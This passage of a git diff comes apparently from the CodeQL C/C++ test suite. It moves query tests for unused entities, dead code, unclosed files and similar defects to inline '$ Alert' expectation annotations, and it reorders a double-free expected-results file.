my_func_b(); int *my_c_ptr = &my_var_c; diff --git a/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedIncludes/unusedIncludes.qlref b/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedIncludes/unusedIncludes.qlref index 9759b522cf3a..c268214a8bf6 100644 --- a/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedIncludes/unusedIncludes.qlref +++ b/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedIncludes/unusedIncludes.qlref @@ -1 +1,2 @@ -Best Practices/Unused Entities/UnusedIncludes.ql +query: Best Practices/Unused Entities/UnusedIncludes.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedLocals/UnusedLocals.qlref b/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedLocals/UnusedLocals.qlref index a206090d0f82..645e1ecaebd8 100644 --- a/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedLocals/UnusedLocals.qlref +++ b/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedLocals/UnusedLocals.qlref @@ -1 +1,2 @@ -Best Practices/Unused Entities/UnusedLocals.ql +query: Best Practices/Unused Entities/UnusedLocals.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedLocals/code.c b/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedLocals/code.c index 74385634c419..313f5048d80f 100644 --- a/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedLocals/code.c +++ b/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedLocals/code.c @@ -7,16 +7,16 @@ void f1(unsigned int x) { } void f2(unsigned int x) { - unsigned int y = x + 1; // BAD: 'y' is unused - unsigned int z = x + 2; // BAD: 'z' is unused + unsigned int y = x + 1; // BAD: 'y' is unused // $ Alert + unsigned int z = x + 2; // BAD: 'z' is unused // $ Alert } #define my_int int #define COMPLEX_MACRO do { int z = 3; } while(0) void f3() { - int x = 1; // BAD: 'x' is unused - my_int y = 2; // BAD: 'y' is unused + int x = 1; // BAD: 'x' is unused // $ Alert + my_int y = 2; // BAD: 'y' is unused // $ Alert COMPLEX_MACRO; // GOOD: unused locals declared in macros are considered OK. } @@ -27,7 +27,7 @@ void write_ptr(int *ptr) { #define ZERO(x) x = 0 int f4() { - int a, b, c, d, e, f, g, h, i, j, k, l, m, n; // BAD: 'n' is unused + int a, b, c, d, e, f, g, h, i, j, k, l, m, n; // BAD: 'n' is unused // $ Alert a = b; c++; @@ -43,13 +43,13 @@ int f4() { } void f5() { - int x; // BAD: 'x' is unused + int x; // BAD: 'x' is unused // $ Alert { int x; { - int x; // BAD: 'x' is unused + int x; // BAD: 'x' is unused // $ Alert } x = 12; @@ -64,7 +64,7 @@ void f6() { int arr2[10]; int arr3[10]; int arr4[10]; - int arr5[10]; // BAD: 'arr5' is unused + int arr5[10]; // BAD: 'arr5' is unused // $ Alert int *ptr; int x; diff --git a/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedLocals/code.cpp b/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedLocals/code.cpp index 3b9904a9a290..af4d2aa33f5f 100644 --- a/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedLocals/code.cpp +++ b/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedLocals/code.cpp @@ -14,7 +14,7 @@ class MyClass { MyClass :: MyClass() { - int a, b, c, d, e; // BAD: 'e' is unused + int a, b, c, d, e; // BAD: 'e' is unused // $ Alert int &f = d; write_ref(a); @@ -29,8 +29,8 @@ MyClass :: ~MyClass() void test() { MyClass mc; // GOOD: constructor and destructor may have side-effects - MyClass *mc_ptr; // BAD: 'mc_ptr' is unused - MyClass &mc_ref = mc; // BAD: 'mc_ref' is unused + MyClass *mc_ptr; // BAD: 'mc_ptr' is unused // $ Alert + MyClass &mc_ref = mc; // BAD: 'mc_ref' is unused // $ Alert } // --- @@ -101,7 +101,7 @@ template void *instantiatedTemplateFunction3() // static unused int variable in twice instantiated template function template void *instantiatedTemplateFunction4() { - static int my_static; // BAD + static int my_static; // BAD // $ Alert static void* my_ptr = 0; return my_ptr; } @@ -129,7 +129,7 @@ void *nonTemplateFunction() // This is a non-template version of the above. void *nonTemplateFunction2() { - static int *my_static; // BAD + static int *my_static; // BAD // $ Alert static void* my_ptr = 0; return my_ptr; } @@ -245,7 +245,7 @@ class MyContainingClass void testFunction() { - MyMethodClass mmc; // BAD: unused + MyMethodClass mmc; // BAD: unused // $ Alert MyConstructorClass mcc; // GOOD MyDerivedClass mdc; // GOOD MyContainingClass mcc2; // GOOD diff --git a/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedLocals/code2.cpp b/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedLocals/code2.cpp index 9a70fe989064..8ec61366ada6 100644 --- a/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedLocals/code2.cpp +++ b/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedLocals/code2.cpp @@ -2,13 +2,13 @@ int test_const_init() { - int v1; // BAD: unused + int v1; // BAD: unused // $ Alert int v2; // GOOD - int v3 = 0; // BAD: unused + int v3 = 0; // BAD: unused // $ Alert int v4 = 0; // GOOD const int v5 = 0; // BAD: unused [NOT DETECTED] const int v6 = 0; // GOOD - constexpr int v7 = 0; // BAD: unused + constexpr int v7 = 0; // BAD: unused // $ Alert constexpr int v8 = 0; // GOOD return v2 + v4 + v6 + v8; @@ -23,7 +23,7 @@ void myFunction() void test_template_parameter() { - constexpr int v1 = 0; // BAD: unused + constexpr int v1 = 0; // BAD: unused // $ Alert constexpr int v2 = 0; // GOOD: used as a template parameter below myFunction(); @@ -39,7 +39,7 @@ class MyBuffer void test_unused() { - MyBuffer myVar1; // BAD: unused + MyBuffer myVar1; // BAD: unused // $ Alert MyBuffer myVar2; // GOOD: used in deliberate void cast below MyBuffer myVar3 __attribute((__unused__)); // GOOD: unused but acknowledged @@ -61,7 +61,7 @@ void test_expect() { int v1 = getter(); // GOOD: v1 is used int v2 = getter(); // GOOD: v2 is used - int v3 = getter(); // BAD: unused + int v3 = getter(); // BAD: unused // $ Alert if (unlikely(v1 < 0)) { @@ -105,7 +105,7 @@ void test_range_based_for() output(v1); } - for (int v2 : myContainer) // BAD: v2 is not used + for (int v2 : myContainer) // BAD: v2 is not used // $ Alert { } } @@ -125,7 +125,7 @@ int test_lambdas1() int test_lambdas2() { - int a, b; // BAD: b is not used + int a, b; // BAD: b is not used // $ Alert auto myLambda = [=]() -> int // BAD: myLambda is not used [NOT DETECTED] (due to containing a Constructor) { return a; diff --git a/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedLocals/errors.c b/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedLocals/errors.c index 5b62ac7500dc..4c3ad88e6d04 100644 --- a/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedLocals/errors.c +++ b/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedLocals/errors.c @@ -7,7 +7,7 @@ void f_error(void) { } void g_error(void) { - int x, y, z; + int x, y, z; // $ Alert // This one should be reported despite the error in another function. z = y + y; } diff --git a/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedStaticFunctions/UnusedStaticFunctions.qlref b/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedStaticFunctions/UnusedStaticFunctions.qlref index dbf4c4e9172c..4865dfd4d434 100644 --- a/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedStaticFunctions/UnusedStaticFunctions.qlref +++ b/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedStaticFunctions/UnusedStaticFunctions.qlref @@ -1 +1,2 @@ -Best Practices/Unused Entities/UnusedStaticFunctions.ql +query: Best Practices/Unused Entities/UnusedStaticFunctions.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedStaticFunctions/unused_functions.c b/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedStaticFunctions/unused_functions.c index e3c2bc809e43..d9290b80d930 100644 --- a/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedStaticFunctions/unused_functions.c +++ b/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedStaticFunctions/unused_functions.c @@ -13,15 +13,15 @@ static void used_function2(void) { printf("Gets run 2\n"); } -static void unused_function(void) { +static void unused_function(void) { // $ Alert printf("Doesn't get run\n"); } -static void unused_function2(void) { +static void unused_function2(void) { // $ Alert printf("Doesn't get run 2\n"); } -static void unused_function3(void) { +static void unused_function3(void) { // $ Alert printf("Doesn't get run 3\n"); unused_function2(); } @@ -60,5 +60,5 @@ static void __attribute__ ((used)) h1(void) { static void __attribute__ ((unused)) h3(void) { } -static void h4(void) { +static void h4(void) { // $ Alert } diff --git a/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedStaticFunctions/unused_mut.c b/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedStaticFunctions/unused_mut.c index 7ce51610eefd..3d824228dbd1 100644 --- a/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedStaticFunctions/unused_mut.c +++ b/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedStaticFunctions/unused_mut.c @@ -2,11 +2,11 @@ static void mut_unused_function(void); static void mut_unused_function2(void); -static void mut_unused_function(void) { +static void mut_unused_function(void) { // $ Alert mut_unused_function2(); } -static void mut_unused_function2(void) { +static void mut_unused_function2(void) { // $ Alert mut_unused_function(); } diff --git a/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedStaticFunctions/unused_static_functions.cpp b/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedStaticFunctions/unused_static_functions.cpp index c0d83b52a578..0c36cf719e4c 100644 --- a/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedStaticFunctions/unused_static_functions.cpp +++ b/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedStaticFunctions/unused_static_functions.cpp @@ -16,7 +16,7 @@ const funstr myClass::fs[] = { }; // f2 is unreachable -static void f2(void) { } +static void f2(void) { } // $ Alert // f3 is reachable via f4/pf3 static void f3(void) { } @@ -30,8 +30,8 @@ void f4(void) { // f5 and f6 are mutually recursive unreachable static functions static void f6(void); -static void f5(void) { f6(); } -static void f6(void) { f5(); } +static void f5(void) { f6(); } // $ Alert +static void f6(void) { f5(); } // $ Alert // f7 and f8 are reachable from `function_caller` static int f7() { return 1; } // GOOD diff --git a/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedStaticFunctions/used_by_var_ref.c b/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedStaticFunctions/used_by_var_ref.c index dc8c10095456..bbbab66f8f46 100644 --- a/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedStaticFunctions/used_by_var_ref.c +++ b/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedStaticFunctions/used_by_var_ref.c @@ -5,9 +5,9 @@ typedef struct _num_fun { } num_fun; static void f(void) {} // Used, via n1 -static void g(void) {} // Not used (n2 is static) +static void g(void) {} // Not used (n2 is static) // $ Alert static void h(void) {} // Used, via n3, via j -static void i(void) {} // Not used (k is static) +static void i(void) {} // Not used (k is static) // $ Alert num_fun n1 = {1, f}; static num_fun n2 = {1, g}; @@ -17,7 +17,7 @@ void j(void) { // Used (not static) num_fun n = n3; } -static void k(void) { // Not used (static) +static void k(void) { // Not used (static) // $ Alert num_fun n = {1, i}; n1.fun = i; } diff --git a/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedStaticVariables/UnusedStaticVariables.qlref b/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedStaticVariables/UnusedStaticVariables.qlref index 1b03ed4104bd..1240fc64dc56 100644 --- a/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedStaticVariables/UnusedStaticVariables.qlref +++ b/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedStaticVariables/UnusedStaticVariables.qlref @@ -1 +1,2 @@ -Best Practices/Unused Entities/UnusedStaticVariables.ql +query: Best Practices/Unused Entities/UnusedStaticVariables.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedStaticVariables/test.cpp b/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedStaticVariables/test.cpp index 2a5eeef6f0f6..0e25037f0513 100644 --- a/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedStaticVariables/test.cpp +++ b/cpp/ql/test/query-tests/Best Practices/Unused Entities/UnusedStaticVariables/test.cpp @@ -4,12 +4,12 @@ static int staticVar1; // GOOD (used) static int staticVar2; // GOOD (used) static int staticVar3 = 3; // GOOD (used) static int staticVar4 = staticVar3; // GOOD (used) -static int staticVar5; // BAD (unused) -static int staticVar6 = 6; // BAD (unused) +static int staticVar5; // BAD (unused) // $ Alert +static int staticVar6 = 6; // BAD (unused) // $ Alert static __attribute__((__unused__)) int staticVar7; // GOOD (unused but this is expected) -const int constVar8 = 8; // BAD (const defaults to static) +const int constVar8 = 8; // BAD (const defaults to static) // $ Alert extern const int constVar9 = 9; // GOOD -static int staticVar10 = 10; // GOOD [FALSE POSITIVE] (referenced in a never instantiated template) +static int staticVar10 = 10; // GOOD [FALSE POSITIVE] (referenced in a never instantiated template) // $ Alert void f() { diff --git a/cpp/ql/test/query-tests/Critical/DeadCodeFunction/DeadCodeFunction.qlref b/cpp/ql/test/query-tests/Critical/DeadCodeFunction/DeadCodeFunction.qlref index d15cbbfecd33..20ad76f506df 100644 --- a/cpp/ql/test/query-tests/Critical/DeadCodeFunction/DeadCodeFunction.qlref +++ b/cpp/ql/test/query-tests/Critical/DeadCodeFunction/DeadCodeFunction.qlref @@ -1 +1,2 @@ -Critical/DeadCodeFunction.ql +query: Critical/DeadCodeFunction.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Critical/DeadCodeFunction/test.cpp b/cpp/ql/test/query-tests/Critical/DeadCodeFunction/test.cpp index 8654b6facd64..e828c24fb8b0 100644 --- a/cpp/ql/test/query-tests/Critical/DeadCodeFunction/test.cpp +++ b/cpp/ql/test/query-tests/Critical/DeadCodeFunction/test.cpp @@ -2,7 +2,7 @@ static void usedByUnused() { } -static void unused() { +static void unused() { // $ Alert usedByUnused(); } diff --git a/cpp/ql/test/query-tests/Critical/DeadCodeGoto/DeadCodeGoto.qlref b/cpp/ql/test/query-tests/Critical/DeadCodeGoto/DeadCodeGoto.qlref index 0786047da5f4..b76abda209d2 100644 --- a/cpp/ql/test/query-tests/Critical/DeadCodeGoto/DeadCodeGoto.qlref +++ b/cpp/ql/test/query-tests/Critical/DeadCodeGoto/DeadCodeGoto.qlref @@ -1 +1,2 @@ -Critical/DeadCodeGoto.ql +query: Critical/DeadCodeGoto.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Critical/DeadCodeGoto/test.cpp b/cpp/ql/test/query-tests/Critical/DeadCodeGoto/test.cpp index 12bef76a1e8a..dd4b5a9c325c 100644 --- a/cpp/ql/test/query-tests/Critical/DeadCodeGoto/test.cpp +++ b/cpp/ql/test/query-tests/Critical/DeadCodeGoto/test.cpp @@ -1,12 +1,12 @@ int test1(int x) { - goto label; // BAD + goto label; // BAD // $ Alert x++; label: return x; } int test2(int x) { do { - break; // BAD + break; // BAD // $ Alert x++; } while(false); return x; @@ -34,7 +34,7 @@ int test5(int x, int y) { goto label; // GOOD break; case 2: - break; // BAD + break; // BAD // $ Alert return x; case 3: return x; diff --git a/cpp/ql/test/query-tests/Critical/FileClosed/FileMayNotBeClosed.qlref b/cpp/ql/test/query-tests/Critical/FileClosed/FileMayNotBeClosed.qlref index 0f09c329e844..8d189be099bf 100644 --- a/cpp/ql/test/query-tests/Critical/FileClosed/FileMayNotBeClosed.qlref +++ b/cpp/ql/test/query-tests/Critical/FileClosed/FileMayNotBeClosed.qlref @@ -1 +1,2 @@ -Critical/FileMayNotBeClosed.ql +query: Critical/FileMayNotBeClosed.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Critical/FileClosed/FileNeverClosed.qlref b/cpp/ql/test/query-tests/Critical/FileClosed/FileNeverClosed.qlref index 825ac26f500c..25b57b1736d7 100644 --- a/cpp/ql/test/query-tests/Critical/FileClosed/FileNeverClosed.qlref +++ b/cpp/ql/test/query-tests/Critical/FileClosed/FileNeverClosed.qlref @@ -1 +1,2 @@ -Critical/FileNeverClosed.ql +query: Critical/FileNeverClosed.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Critical/FileClosed/file.c b/cpp/ql/test/query-tests/Critical/FileClosed/file.c index 3d4bd39b1dce..fcc108631509 100644 --- a/cpp/ql/test/query-tests/Critical/FileClosed/file.c +++ b/cpp/ql/test/query-tests/Critical/FileClosed/file.c @@ -5,7 +5,7 @@ int fclose(FILE *fp); #define NULL ((FILE *)0) void f1(int i) { - FILE *f = fopen("somefile.txt", "r"); + FILE *f = fopen("somefile.txt", "r"); // $ Alert[cpp/file-may-not-be-closed] if (!f) return; @@ -15,7 +15,7 @@ void f1(int i) { } FILE *f2(int i) { - FILE *f = fopen("somefile.txt", "r"); + FILE *f = fopen("somefile.txt", "r"); // $ Alert[cpp/file-may-not-be-closed] if (!f) return NULL; @@ -31,7 +31,7 @@ void g2(int i) { } void f3(int i) { - FILE *f = fopen("somefile.txt", "r"); // Never closed + FILE *f = fopen("somefile.txt", "r"); // Never closed // $ Alert[cpp/file-never-closed] if (!f) return; @@ -63,7 +63,7 @@ void g5(void) { int f6(int b) { FILE *f; - f = fopen("somefile.txt", "r"); // Not always closed + f = fopen("somefile.txt", "r"); // Not always closed // $ Alert[cpp/file-may-not-be-closed] if (f) { if (b) { diff --git a/cpp/ql/test/query-tests/Critical/GlobalUseBeforeInit/GlobalUseBeforeInit.qlref b/cpp/ql/test/query-tests/Critical/GlobalUseBeforeInit/GlobalUseBeforeInit.qlref index a186cc827ec5..7d2be720b2a7 100644 --- a/cpp/ql/test/query-tests/Critical/GlobalUseBeforeInit/GlobalUseBeforeInit.qlref +++ b/cpp/ql/test/query-tests/Critical/GlobalUseBeforeInit/GlobalUseBeforeInit.qlref @@ -1 +1,2 @@ -Critical/GlobalUseBeforeInit.ql +query: Critical/GlobalUseBeforeInit.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Critical/GlobalUseBeforeInit/test.cpp b/cpp/ql/test/query-tests/Critical/GlobalUseBeforeInit/test.cpp index 81883a1a8a16..0a3ceabaef8f 100644 --- a/cpp/ql/test/query-tests/Critical/GlobalUseBeforeInit/test.cpp +++ b/cpp/ql/test/query-tests/Critical/GlobalUseBeforeInit/test.cpp @@ -25,7 +25,7 @@ int my_printf(const char * fmt, ...) return ret; } -int f1() +int f1() // $ Alert { my_printf("%d\n", a + 2); my_printf("%d\n", b + 2); // BAD @@ -36,7 +36,7 @@ void f2() { my_printf("%d\n", b); // GOOD } -int main() +int main() // $ Alert { unsigned size = sizeof(*c); // GOOD my_printf("%d\n", b); // BAD diff --git a/cpp/ql/test/query-tests/Critical/InitialisationNotRun/InitialisationNotRun.qlref b/cpp/ql/test/query-tests/Critical/InitialisationNotRun/InitialisationNotRun.qlref index 7012169e8945..611d7f42e828 100644 --- a/cpp/ql/test/query-tests/Critical/InitialisationNotRun/InitialisationNotRun.qlref +++ b/cpp/ql/test/query-tests/Critical/InitialisationNotRun/InitialisationNotRun.qlref @@ -1 +1,2 @@ -Critical/InitialisationNotRun.ql +query: Critical/InitialisationNotRun.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Critical/InitialisationNotRun/test.cpp b/cpp/ql/test/query-tests/Critical/InitialisationNotRun/test.cpp index ee0d070df088..3a02dc9be822 100644 --- a/cpp/ql/test/query-tests/Critical/InitialisationNotRun/test.cpp +++ b/cpp/ql/test/query-tests/Critical/InitialisationNotRun/test.cpp @@ -9,9 +9,9 @@ class GlobalStorage { char name[1000]; }; -GlobalStorage *g1; // BAD +GlobalStorage *g1; // BAD // $ Alert static GlobalStorage g2; // GOOD -static GlobalStorage *g3; // BAD +static GlobalStorage *g3; // BAD // $ Alert // static variables are initialized by compilers static int a; // GOOD static int b = 0; // GOOD diff --git a/cpp/ql/test/query-tests/Critical/LargeParameter/LargeParameter.qlref b/cpp/ql/test/query-tests/Critical/LargeParameter/LargeParameter.qlref index 6ddcc7785549..379794ff5e73 100644 --- a/cpp/ql/test/query-tests/Critical/LargeParameter/LargeParameter.qlref +++ b/cpp/ql/test/query-tests/Critical/LargeParameter/LargeParameter.qlref @@ -1 +1,2 @@ -Critical/LargeParameter.ql +query: Critical/LargeParameter.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Critical/LargeParameter/test.cpp b/cpp/ql/test/query-tests/Critical/LargeParameter/test.cpp index bf6d3d414fc4..aeddebf3e67c 100644 --- a/cpp/ql/test/query-tests/Critical/LargeParameter/test.cpp +++ b/cpp/ql/test/query-tests/Critical/LargeParameter/test.cpp @@ -13,7 +13,7 @@ class myTemplateClass public: myTemplateClass() {} - void set(T _t) { // BAD: T can be myLargeStruct, which is large + void set(T _t) { // BAD: T can be myLargeStruct, which is large // $ Alert t = _t; } @@ -21,11 +21,11 @@ class myTemplateClass }; template -void myTemplateFunction(myTemplateClass mtc_t) // BAD: T can be myLargeStruct, which is large +void myTemplateFunction(myTemplateClass mtc_t) // BAD: T can be myLargeStruct, which is large // $ Alert { } -void myFunction1(mySmallStruct a, myLargeStruct b) // BAD: b is large +void myFunction1(mySmallStruct a, myLargeStruct b) // BAD: b is large // $ Alert { myTemplateClass mtc_a; myTemplateClass mtc_b; @@ -101,12 +101,12 @@ void myFunction4( } void myFunction5( - MyLargeClass a, // BAD - MyLargeClass b, // BAD - MyLargeClass c, // BAD - MyLargeClass d, // BAD - MyLargeClass e, // BAD - MyLargeClass f // BAD + MyLargeClass a, // BAD // $ Alert + MyLargeClass b, // BAD // $ Alert + MyLargeClass c, // BAD // $ Alert + MyLargeClass d, // BAD // $ Alert + MyLargeClass e, // BAD // $ Alert + MyLargeClass f // BAD // $ Alert ) { const MyLargeClass *mlc_ptr; @@ -158,7 +158,7 @@ struct big void myFunction7( big a, // GOOD - big b // BAD + big b // BAD // $ Alert ) { a.xs[0]++; // modifies a diff --git a/cpp/ql/test/query-tests/Critical/MemoryFreed/DoubleFree.expected b/cpp/ql/test/query-tests/Critical/MemoryFreed/DoubleFree.expected index 9636f170e0be..290b5d8a9917 100644 --- a/cpp/ql/test/query-tests/Critical/MemoryFreed/DoubleFree.expected +++ b/cpp/ql/test/query-tests/Critical/MemoryFreed/DoubleFree.expected @@ -1,3 +1,18 @@ +#select +| test_free.cpp:14:10:14:10 | a | test_free.cpp:11:10:11:10 | pointer to free output argument | test_free.cpp:14:10:14:10 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:14:10:14:10 | a | a | test_free.cpp:11:5:11:8 | call to free | call to free | +| test_free.cpp:31:27:31:27 | a | test_free.cpp:30:10:30:10 | pointer to free output argument | test_free.cpp:31:27:31:27 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:31:27:31:27 | a | a | test_free.cpp:30:5:30:8 | call to free | call to free | +| test_free.cpp:37:27:37:27 | a | test_free.cpp:35:10:35:10 | pointer to free output argument | test_free.cpp:37:27:37:27 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:37:27:37:27 | a | a | test_free.cpp:35:5:35:8 | call to free | call to free | +| test_free.cpp:46:10:46:10 | a | test_free.cpp:42:27:42:27 | pointer to free output argument | test_free.cpp:46:10:46:10 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:46:10:46:10 | a | a | test_free.cpp:42:22:42:25 | call to free | call to free | +| test_free.cpp:46:10:46:10 | a | test_free.cpp:44:27:44:27 | pointer to free output argument | test_free.cpp:46:10:46:10 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:46:10:46:10 | a | a | test_free.cpp:44:22:44:25 | call to free | call to free | +| test_free.cpp:51:10:51:10 | a | test_free.cpp:50:27:50:27 | pointer to free output argument | test_free.cpp:51:10:51:10 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:51:10:51:10 | a | a | test_free.cpp:50:22:50:25 | call to free | call to free | +| test_free.cpp:72:14:72:14 | a | test_free.cpp:69:10:69:10 | pointer to free output argument | test_free.cpp:72:14:72:14 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:72:14:72:14 | a | a | test_free.cpp:69:5:69:8 | call to free | call to free | +| test_free.cpp:85:12:85:12 | a | test_free.cpp:83:12:83:12 | pointer to operator delete output argument | test_free.cpp:85:12:85:12 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:85:12:85:12 | a | a | test_free.cpp:83:5:83:13 | delete | delete | +| test_free.cpp:103:10:103:10 | a | test_free.cpp:101:10:101:10 | pointer to free output argument | test_free.cpp:103:10:103:10 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:103:10:103:10 | a | a | test_free.cpp:101:5:101:8 | call to free | call to free | +| test_free.cpp:129:10:129:11 | * ... | test_free.cpp:128:10:128:11 | pointer to free output argument | test_free.cpp:129:10:129:11 | * ... | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:129:10:129:11 | * ... | * ... | test_free.cpp:128:5:128:8 | call to free | call to free | +| test_free.cpp:154:10:154:10 | a | test_free.cpp:152:27:152:27 | pointer to free output argument | test_free.cpp:154:10:154:10 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:154:10:154:10 | a | a | test_free.cpp:152:22:152:25 | call to free | call to free | +| test_free.cpp:209:10:209:10 | a | test_free.cpp:207:10:207:10 | pointer to free output argument | test_free.cpp:209:10:209:10 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:209:10:209:10 | a | a | test_free.cpp:207:5:207:8 | call to free | call to free | +| test_free.cpp:302:12:302:14 | buf | test_free.cpp:301:12:301:14 | pointer to g_free output argument | test_free.cpp:302:12:302:14 | buf | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:302:12:302:14 | buf | buf | test_free.cpp:301:5:301:10 | call to g_free | call to g_free | +| test_free.cpp:322:12:322:12 | a | test_free.cpp:319:16:319:16 | pointer to operator delete output argument | test_free.cpp:322:12:322:12 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:322:12:322:12 | a | a | test_free.cpp:319:9:319:16 | delete | delete | edges | test_free.cpp:11:10:11:10 | pointer to free output argument | test_free.cpp:14:10:14:10 | a | provenance | | | test_free.cpp:30:10:30:10 | pointer to free output argument | test_free.cpp:31:27:31:27 | a | provenance | | @@ -43,18 +58,3 @@ nodes | test_free.cpp:319:16:319:16 | pointer to operator delete output argument | semmle.label | pointer to operator delete output argument | | test_free.cpp:322:12:322:12 | a | semmle.label | a | subpaths -#select -| test_free.cpp:14:10:14:10 | a | test_free.cpp:11:10:11:10 | pointer to free output argument | test_free.cpp:14:10:14:10 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:14:10:14:10 | a | a | test_free.cpp:11:5:11:8 | call to free | call to free | -| test_free.cpp:31:27:31:27 | a | test_free.cpp:30:10:30:10 | pointer to free output argument | test_free.cpp:31:27:31:27 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:31:27:31:27 | a | a | test_free.cpp:30:5:30:8 | call to free | call to free | -| test_free.cpp:37:27:37:27 | a | test_free.cpp:35:10:35:10 | pointer to free output argument | test_free.cpp:37:27:37:27 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:37:27:37:27 | a | a | test_free.cpp:35:5:35:8 | call to free | call to free | -| test_free.cpp:46:10:46:10 | a | test_free.cpp:42:27:42:27 | pointer to free output argument | test_free.cpp:46:10:46:10 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:46:10:46:10 | a | a | test_free.cpp:42:22:42:25 | call to free | call to free | -| test_free.cpp:46:10:46:10 | a | test_free.cpp:44:27:44:27 | pointer to free output argument | test_free.cpp:46:10:46:10 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:46:10:46:10 | a | a | test_free.cpp:44:22:44:25 | call to free | call to free | -| test_free.cpp:51:10:51:10 | a | test_free.cpp:50:27:50:27 | pointer to free output argument | test_free.cpp:51:10:51:10 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:51:10:51:10 | a | a | test_free.cpp:50:22:50:25 | call to free | call to free | -| test_free.cpp:72:14:72:14 | a | test_free.cpp:69:10:69:10 | pointer to free output argument | test_free.cpp:72:14:72:14 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:72:14:72:14 | a | a | test_free.cpp:69:5:69:8 | call to free | call to free | -| test_free.cpp:85:12:85:12 | a | test_free.cpp:83:12:83:12 | pointer to operator delete output argument | test_free.cpp:85:12:85:12 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:85:12:85:12 | a | a | test_free.cpp:83:5:83:13 | delete | delete | -| test_free.cpp:103:10:103:10 | a | test_free.cpp:101:10:101:10 | pointer to free output argument | test_free.cpp:103:10:103:10 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:103:10:103:10 | a | a | test_free.cpp:101:5:101:8 | call to free | call to free | -| test_free.cpp:129:10:129:11 | * ... | test_free.cpp:128:10:128:11 | pointer to free output argument | test_free.cpp:129:10:129:11 